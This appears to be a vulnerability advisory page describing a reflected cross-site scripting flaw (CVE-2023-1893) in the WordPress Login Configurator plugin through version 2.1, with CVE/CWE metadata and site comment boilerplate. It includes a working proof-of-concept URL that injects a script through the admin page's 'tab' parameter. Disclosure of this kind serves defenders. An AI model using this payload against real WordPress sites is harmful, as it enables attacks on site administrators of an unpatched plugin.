WordPress Login Configurator 2.1 Cross Site Scripting

2023.07.27

Credit: Taurus Omar

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2023-1893

CWE: CWE-79

Tittle:
WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting

References:
CVE-2023-1893

Author:
Taurus Omar 

Description:
The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.

Affects Plugins:
Login Configurator - No known fix - plugin closed

Proof of Concept:

Visit the following path:

/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top  


Classification:
Type XSS 
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Login Configurator 2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.